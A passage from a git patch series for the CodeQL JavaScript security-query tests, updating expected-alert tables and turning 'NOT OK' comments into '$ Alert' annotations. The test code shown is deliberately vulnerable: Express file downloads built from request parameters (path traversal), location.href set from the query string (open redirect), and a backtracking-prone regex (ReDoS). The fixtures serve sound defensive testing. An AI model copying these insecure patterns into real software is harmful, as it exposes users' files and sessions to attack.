x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | +| tst-escapes.js:20:1:20:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | +| tst-escapes.js:21:1:21:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | +| tst-escapes.js:22:1:22:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. | +| tst-escapes.js:23:1:23:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | +| tst-escapes.js:24:1:24:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:27:8:27:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:29:8:29:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:31:8:31:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:33:8:33:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:35:8:35:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:40:1:40:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | +| tst-escapes.js:46:8:46:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | +| tst-escapes.js:48:8:48:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | +| tst-escapes.js:64:8:64:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:65:8:65:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:69:8:69:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js index f776c9d40e68..b65448ec41b2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/tst-escapes.js @@ -1,5 +1,3 @@ -// (the lines of this file are not annotated with alert expectations) - // no backslashes RegExp("abcdefghijklmnopqrstuvxyz"); RegExp("ABCDEFGHIJKLMNOPQRSTUVXYZ"); From 87518ba60e237266d8b6aa2334a58d44778c6e48 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:09:21 +0100 Subject: [PATCH 090/115] JS: Update tainted-sendFile.js This file was added on main while this branch was in progress. Porting the whole file in one step. --- .../CWE-022/TaintedPath/TaintedPath.expected | 24 +++++++++---------- .../CWE-022/TaintedPath/tainted-sendFile.js | 13 ++++------ 2 files changed, 17 insertions(+), 20 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected index 14fcafa92069..338cd21265d3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected @@ -161,10 +161,10 @@ | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:15:43:15:58 | req.param("dir") | user-provided value | | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:21:37:21:48 | req.params.x | user-provided value | | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:22:34:22:45 | req.params.x | user-provided value | -| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:30:37:30:48 | req.params.x | user-provided value | -| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:32:34:32:45 | req.params.x | user-provided value | -| tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:35:43:35:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:28:37:28:48 | req.params.x | user-provided value | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:30:34:30:45 | req.params.x | user-provided value | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:32:43:32:58 | req.param("dir") | user-provided value | | tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | @@ -571,8 +571,8 @@ edges | tainted-promise-steps.js:12:20:12:23 | path | tainted-promise-steps.js:12:44:12:47 | path | provenance | | | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | provenance | Config | | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | provenance | Config | -| tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | provenance | Config | -| tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | provenance | Config | +| tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | provenance | Config | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:8:18:8:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:9:18:9:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:10:18:10:21 | path | provenance | | @@ -1080,12 +1080,12 @@ nodes | tainted-sendFile.js:21:37:21:48 | req.params.x | semmle.label | req.params.x | | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | | tainted-sendFile.js:22:34:22:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | semmle.label | req.param("gimme") | -| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | -| tainted-sendFile.js:30:37:30:48 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | -| tainted-sendFile.js:32:34:32:45 | req.params.x | semmle.label | req.params.x | -| tainted-sendFile.js:35:43:35:58 | req.param("dir") | semmle.label | req.param("dir") | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | semmle.label | req.param("gimme") | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | semmle.label | homeDir ... arams.x | +| tainted-sendFile.js:28:37:28:48 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | semmle.label | path.jo ... rams.x) | +| tainted-sendFile.js:30:34:30:45 | req.params.x | semmle.label | req.params.x | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | semmle.label | req.param("dir") | | tainted-string-steps.js:6:7:6:48 | path | semmle.label | path | | tainted-string-steps.js:6:14:6:37 | url.par ... , true) | semmle.label | url.par ... , true) | | tainted-string-steps.js:6:14:6:43 | url.par ... ).query | semmle.label | url.par ... ).query | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js index 9a200f2a4c99..1c58a6943fa2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js @@ -23,17 +23,14 @@ app.get('/some/path/:x', function(req, res) { res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/' - // BAD: downloading a file based on un-sanitized query parameters - res.download(req.param("gimme")); + res.download(req.param("gimme")); // $ Alert - // BAD: download allows ../ - res.download(homeDir + '/data/' + req.params.x); + res.download(homeDir + '/data/' + req.params.x); // $ Alert - res.download(path.join('data', req.params.x)); // NOT OK + res.download(path.join('data', req.params.x)); // $ Alert - // BAD: doesn't help if user controls root - res.download(req.param("file"), { root: req.param("dir") }); + res.download(req.param("file"), { root: req.param("dir") }); // $ Alert - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.download(req.param("gimme"), { root: process.cwd() }); }); From b4ac2f7d73eb6bc330d13230b7fffd99b71812f9 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:21:07 +0100 Subject: [PATCH 091/115] JS: Add a query ID --- .../ql/test/query-tests/Security/CWE-200/googlecompiler.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js index b71ed168533f..4a92f5f29fb4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js @@ -34,7 +34,7 @@ function PostCode(codestring) { }); }); - post_req.write(post_data); // $ Alert - post the data from file to request body + post_req.write(post_data); // $ Alert[js/file-access-to-http] - post the data from file to request body post_req.end(); } From fd6a9c614408c897261b96be25896cef6f513b4a Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:21:20 +0100 Subject: [PATCH 092/115] JS: Accept an alert --- javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js index c5b183cb273d..d5a28e5858dc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -342,4 +342,4 @@ var unicode = /^\n\u0000(\u0000|.)+$/; // $ Alert[js/redos] var largeUnicode = new RegExp("^\n\u{1F680}(\u{1F680}|.)+X$"); // $ Alert[js/redos] -var unicodeSets = /(aa?)*b/v; +var unicodeSets = /(aa?)*b/v; // $ Alert[js/redos] From 19cada38ffc765705fcd9720afca34565b6c9735 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:21:40 +0100 Subject: [PATCH 093/115] JS: Migrate a new file from OK-style comments --- .../Security/CWE-601/ClientSideUrlRedirect/tst16.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js index 49c88a892c9e..edeaa40174d4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js +++ b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst16.js @@ -2,7 +2,7 @@ import queryString from 'query-string'; import querystringify from 'querystringify'; function foo() { - location.href = queryString.parse(location.search).data; // NOT OK - location.href = queryString.extract(location.search); // NOT OK - location.href = querystringify.parse(location.search).data; // NOT OK + location.href = queryString.parse(location.search).data; // $ Alert + location.href = queryString.extract(location.search); // $ Alert + location.href = querystringify.parse(location.search).data; // $ Alert } From 64d39da5f81be4600aa207c997ed0643a711a631 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 26 Feb 2025 13:57:10 +0100 Subject: [PATCH 094/115] JS: Accept Sources/Sink tags --- .../tst-UntrustedDataToExternalAPI.js | 2 +- .../CWE-022/TaintedPath/TaintedPath-es6.js | 2 +- .../CWE-022/TaintedPath/TaintedPath.js | 18 +- .../TaintedPath/examples/TaintedPath.js | 2 +- .../CWE-022/TaintedPath/normalizedPaths.js | 46 ++-- .../CWE-022/TaintedPath/other-fs-libraries.js | 10 +- .../Security/CWE-022/TaintedPath/prettier.js | 2 +- .../Security/CWE-022/TaintedPath/pupeteer.js | 2 +- .../CWE-022/TaintedPath/sharedlib-repro.js | 2 +- .../TaintedPath/tainted-access-paths.js | 6 +- .../TaintedPath/tainted-promise-steps.js | 2 +- .../TaintedPath/tainted-string-steps.js | 2 +- .../Security/CWE-022/TaintedPath/torrents.js | 2 +- .../CWE-022/TaintedPath/typescript.ts | 2 +- .../Security/CWE-022/ZipSlip/ZipSlipBad.js | 10 +- .../Security/CWE-022/ZipSlip/ZipSlipBad2.js | 2 +- .../CWE-022/ZipSlip/ZipSlipBadUnzipper.js | 2 +- .../test/query-tests/Security/CWE-073/tst.js | 4 +- .../test/query-tests/Security/CWE-073/tst2.js | 10 +- .../CWE-078/CommandInjection/actions.js | 4 +- .../CommandInjection/child_process-test.js | 18 +- .../CWE-078/CommandInjection/exec-sh.js | 4 +- .../CWE-078/CommandInjection/exec-sh2.js | 4 +- .../CWE-078/CommandInjection/execSeries.js | 2 +- .../CWE-078/CommandInjection/form-parsers.js | 12 +- .../CWE-078/CommandInjection/other.js | 2 +- .../third-party-command-injection.js | 2 +- .../IndirectCommandInjection/actions.js | 2 +- ...ommand-line-parameter-command-injection.js | 32 +-- .../second-order.js | 4 +- .../lib/isImported.js | 4 +- .../UnsafeShellCommandConstruction/lib/lib.js | 246 +++++++++--------- .../lib/lib2.js | 8 +- .../lib/subLib/amdSub.js | 4 +- .../lib/subLib/index.js | 10 +- .../lib/subLib2/compiled-file.ts | 4 +- .../lib/subLib2/special-file.js | 4 +- .../lib/subLib3/my-file.ts | 4 +- .../lib/subLib4/index.js | 2 +- .../lib/subLib4/subsub.js | 2 +- .../CWE-079/DomBasedXss/addEventListener.js | 6 +- .../DomBasedXss/angular-tempate-url.js | 2 +- .../CWE-079/DomBasedXss/classnames.js | 2 +- .../Security/CWE-079/DomBasedXss/clipboard.ts | 8 +- .../Security/CWE-079/DomBasedXss/d3.js | 2 +- .../Security/CWE-079/DomBasedXss/dates.js | 8 +- .../CWE-079/DomBasedXss/dragAndDrop.ts | 6 +- .../Security/CWE-079/DomBasedXss/jquery.js | 4 +- .../CWE-079/DomBasedXss/json-stringify.jsx | 2 +- .../CWE-079/DomBasedXss/jwt-server.js | 2 +- .../CWE-079/DomBasedXss/optionalSanitizer.js | 4 +- .../CWE-079/DomBasedXss/pages/[id].jsx | 6 +- .../CWE-079/DomBasedXss/react-native.js | 2 +- .../CWE-079/DomBasedXss/react-use-state.js | 8 +- .../Security/CWE-079/DomBasedXss/sanitiser.js | 2 +- .../CWE-079/DomBasedXss/stored-xss.js | 4 +- .../tainted-url-suffix-arguments.js | 2 +- .../Security/CWE-079/DomBasedXss/tooltip.jsx | 4 +- .../Security/CWE-079/DomBasedXss/translate.js | 2 +- .../CWE-079/DomBasedXss/trusted-types.js | 4 +- .../Security/CWE-079/DomBasedXss/tst.js | 62 ++--- .../Security/CWE-079/DomBasedXss/tst3.js | 2 +- .../Security/CWE-079/DomBasedXss/typeahead.js | 2 +- .../various-concat-obfuscations.js | 2 +- .../Security/CWE-079/DomBasedXss/winjs.js | 2 +- .../CWE-079/ExceptionXss/exception-xss.js | 12 +- .../CWE-079/ReflectedXss/ReflectedXss.js | 8 +- .../CWE-079/ReflectedXss/ReflectedXssGood3.js | 2 +- .../Security/CWE-079/ReflectedXss/etherpad.js | 2 +- .../CWE-079/ReflectedXss/formatting.js | 2 +- .../CWE-079/ReflectedXss/live-server.js | 4 +- .../Security/CWE-079/ReflectedXss/partial.js | 8 +- .../Security/CWE-079/ReflectedXss/promises.js | 2 +- .../Security/CWE-079/ReflectedXss/tst2.js | 14 +- .../Security/CWE-079/ReflectedXss/tst3.js | 4 +- .../StoredXss/xss-through-filenames.js | 4 +- .../CWE-079/StoredXss/xss-through-torrent.js | 2 +- .../UnsafeHtmlConstruction/jquery-plugin.js | 2 +- .../UnsafeHtmlConstruction/lib/src/MyNode.ts | 2 +- .../UnsafeHtmlConstruction/lib2/index.ts | 4 +- .../UnsafeHtmlConstruction/lib2/src/MyNode.ts | 2 +- .../CWE-079/UnsafeHtmlConstruction/main.js | 20 +- .../CWE-079/UnsafeHtmlConstruction/typed.ts | 4 +- .../unsafe-jquery-plugin.js | 30 +-- .../Security/CWE-079/XssThroughDom/angular.ts | 2 +- .../Security/CWE-079/XssThroughDom/forms.js | 16 +- .../CWE-079/XssThroughDom/xss-through-dom.js | 12 +- .../CWE-089/local-threat-source/test.js | 2 +- .../Security/CWE-089/typed/typedClient.ts | 4 +- .../Security/CWE-089/untyped/graphql.js | 12 +- .../CWE-089/untyped/html-sanitizer.js | 2 +- .../CWE-089/untyped/json-schema-validator.js | 4 +- .../Security/CWE-089/untyped/koarouter.js | 2 +- .../Security/CWE-089/untyped/ldap.js | 2 +- .../CWE-089/untyped/marsdb-flow-to.js | 2 +- .../Security/CWE-089/untyped/marsdb.js | 2 +- .../Security/CWE-089/untyped/minimongo.js | 2 +- .../Security/CWE-089/untyped/mongodb.js | 12 +- .../CWE-089/untyped/mongodb_bodySafe.js | 2 +- .../Security/CWE-089/untyped/mongoose.js | 4 +- .../CWE-089/untyped/mongooseJsonParse.js | 2 +- .../CWE-089/untyped/mongooseModelClient.js | 2 +- .../Security/CWE-089/untyped/mysql.js | 2 +- .../CWE-089/untyped/pg-promise-types.ts | 2 +- .../Security/CWE-089/untyped/pg-promise.js | 2 +- .../Security/CWE-089/untyped/redis.js | 4 +- .../Security/CWE-089/untyped/socketio.js | 2 +- .../Security/CWE-089/untyped/tst3.js | 2 +- .../CodeInjection/bad-code-sanitization.js | 4 +- .../Security/CWE-094/CodeInjection/express.js | 6 +- .../CWE-094/CodeInjection/lib/index.js | 8 +- .../CWE-094/CodeInjection/react-native.js | 2 +- .../CWE-094/CodeInjection/template-sinks.js | 2 +- .../Security/CWE-094/CodeInjection/tst.js | 2 +- .../UnsafeDynamicMethodAccess/example.js | 2 +- .../CWE-094/UnsafeDynamicMethodAccess/tst.js | 2 +- .../CWE-116/IncompleteSanitization/tst.js | 2 +- .../Security/CWE-117/logInjectionBad.js | 12 +- .../Security/CWE-200/FileAccessToHttp.js | 2 +- .../Security/CWE-200/bufferRead.js | 2 +- .../Security/CWE-200/googlecompiler.js | 2 +- .../Security/CWE-200/readFileSync.js | 2 +- .../Security/CWE-200/readStreamRead.js | 2 +- .../query-tests/Security/CWE-200/request.js | 4 +- .../Security/CWE-200/sentAsHeaders.js | 2 +- .../Security/CWE-201/PostMessageStar2.js | 2 +- .../test/query-tests/Security/CWE-209/node.js | 2 +- .../test/query-tests/Security/CWE-209/tst.js | 2 +- .../Security/CWE-312/CleartextStorage.js | 2 +- .../Security/CWE-312/CleartextStorage2.js | 2 +- .../Security/CWE-312/build-leaks.js | 6 +- .../query-tests/Security/CWE-312/passwords.js | 22 +- .../Security/CWE-312/passwords_in_server_5.js | 2 +- .../test/query-tests/Security/CWE-327/tst.js | 2 +- .../test/query-tests/Security/CWE-338/tst.js | 8 +- .../test/query-tests/Security/CWE-346/tst.js | 2 +- .../CWE-377/insecure-temporary-file.js | 6 +- .../Security/CWE-400/ReDoS/lib/closure.js | 4 +- .../Security/CWE-400/ReDoS/lib/indirect.js | 4 +- .../Security/CWE-400/ReDoS/lib/lib.js | 22 +- .../CWE-400/ReDoS/lib/moduleLib/moduleLib.js | 4 +- .../ReDoS/lib/otherLib/js/src/index.js | 4 +- .../Security/CWE-400/ReDoS/lib/snapdragon.js | 12 +- .../CWE-400/ReDoS/lib/subLib4/factory.js | 4 +- .../CWE-400/ReDoS/lib/subLib5/feature.js | 4 +- .../CWE-400/ReDoS/lib/subLib5/main.js | 4 +- .../CWE-400/ReDoS/lib/subLib5/subclass.js | 4 +- .../CWE-400/ReDoS/lib/subLib6/index.js | 4 +- .../CWE-400/ReDoS/lib/sublib/factory.js | 4 +- .../CWE-400/ReDoS/polynomial-redos.js | 148 +++++------ .../CWE-400/RemovePropertyInjection/tst.js | 2 +- .../RemovePropertyInjection/tstNonExpr.js | 2 +- .../test/query-tests/Security/CWE-506/tst.js | 4 +- .../CWE-522-DecompressionBombs/adm-zip.js | 2 +- .../CWE-522-DecompressionBombs/jszip.js | 2 +- .../CWE-522-DecompressionBombs/node-tar.js | 2 +- .../CWE-522-DecompressionBombs/pako.js | 4 +- .../CWE-522-DecompressionBombs/unzipper.js | 2 +- .../CWE-522-DecompressionBombs/yauzl.js | 2 +- .../CWE-522-DecompressionBombs/zlib.js | 8 +- .../CWE-601/ClientSideUrlRedirect/electron.js | 2 +- .../ClientSideUrlRedirect/regexp-exec.js | 10 +- .../ClientSideUrlRedirect/sanitizer.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst13.js | 14 +- .../CWE-601/ClientSideUrlRedirect/tst15.js | 6 +- .../CWE-601/ClientSideUrlRedirect/tst2.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst6.js | 2 +- .../CWE-601/ClientSideUrlRedirect/typed.ts | 8 +- .../ServerSideUrlRedirectGood2.js | 2 +- .../CWE-601/ServerSideUrlRedirect/express.js | 10 +- .../CWE-601/ServerSideUrlRedirect/koa.js | 2 +- .../CWE-601/ServerSideUrlRedirect/node.js | 6 +- .../ServerSideUrlRedirect/react-native.js | 2 +- .../Security/CWE-643/XpathInjectionBad.js | 2 +- .../test/query-tests/Security/CWE-643/tst.js | 2 +- .../test/query-tests/Security/CWE-643/tst2.js | 2 +- .../Security/CWE-730/RegExpInjection.js | 10 +- .../Security/CWE-730/server-crash.js | 24 +- .../test/query-tests/Security/CWE-730/tst.js | 2 +- .../CWE-754/UnsafeDynamicMethodAccess.js | 2 +- .../CWE-754/UnvalidatedDynamicMethodCall.js | 2 +- .../CWE-754/UnvalidatedDynamicMethodCall2.js | 2 +- .../UnvalidatedDynamicMethodCallGood4.js | 2 +- .../test/query-tests/Security/CWE-754/tst.js | 4 +- .../ResourceExhaustion_timeout.js | 2 +- .../ResourceExhaustion/resource-exhaustion.js | 2 +- .../query-tests/Security/CWE-776/closure.js | 2 +- .../query-tests/Security/CWE-776/domparser.js | 2 +- 